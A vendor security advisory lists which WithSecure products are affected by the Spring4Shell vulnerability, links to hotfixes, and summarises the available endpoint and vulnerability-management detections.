Are WithSecure products affected by Spring4Shell (CVE-2022-22965) vulnerability?

The following products are affected by the Spring4Shell vulnerability:

Policy Manager Windows/Linux 15.x
Policy Manager Proxy Windows/Linux 15.x
Elements Connector

We have released hotfixes to address this vulnerability:

Policy Manager Windows: https://download.f-secure.com/corpro/pm/pms-pmp-hotfix-spring4shell-5.2.20.zip
Policy Manager Linux: https://download.f-secure.com/corpro/pm_linux/pms-pmp-hotfix-spring4shell-5.2.20.zip
Elements Connector: https://download.sp.f-secure.com/PSB/latest/installer/ec-hotfix-spring4shell-5.2.20.zip

Regarding detections for the vulnerability, the current status as of 4.4.2022 is:

Endpoint Protection Products (Elements Endpoint Protection, Business Suite Client Security, and Server Security)

We already have a generic DeepGuard detection Exploit: W32/JavaLaunch.A!DeepGuard blocks suspicious processes started by a Java application, especially commands that try to download a next-stage payload. We created this for the log4j vulnerabilities in 12/2021 but it should work for any RCE exploits in Java processes.

But to clarify, this DeepGuard detection does not detect RCE exploits themselves, it is meant to block suspicious "post-exploitation" activity, i.e. a detection for remote command execution.

Elements Vulnerability Management

The coverage for the detection CVE-2022-22965 is available now in the EVM portal.